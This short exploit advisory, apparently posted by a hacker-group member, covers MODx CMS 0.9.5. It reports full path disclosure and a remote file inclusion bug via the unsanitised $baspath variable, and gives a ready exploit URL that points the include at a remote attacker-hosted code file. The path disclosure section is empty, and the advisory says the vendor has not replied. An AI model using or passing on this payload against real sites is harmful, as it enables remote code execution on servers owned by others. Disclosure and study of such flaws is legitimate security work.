**********************************
*AuThor:Silitoad *
*emA!l:Silitoad[at]hotmail[dot]Com *
*HoMePaGe:http://www.silitoad.org *
**********************************


Powered By Silitoad From Arabian-Fighterz

[Info]

Website: http://modxcms.com/
Version: 0.9.5
Download:
http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.5.zip
Problem: Full path disclosure,Include file

bug: include_once $baspath."/tmplvars.format.inc.php";
     include_once $baspath."/tmplvars.commands.inc.php";

[Vuls]

1.Full path disclosure:


[Exploit]

http://target//manager/includes/document.parser.class.inc.php?baspath=http://evilcode.txt
?

[Fix]

Vuls has been reported to author,No reply yet.

[Greetings]

Greets To
l1nuxm4,Sn1p8r,Sbitar,Op3runix,Diabolax,Master_lsd,Hypn0se,Dvorak-....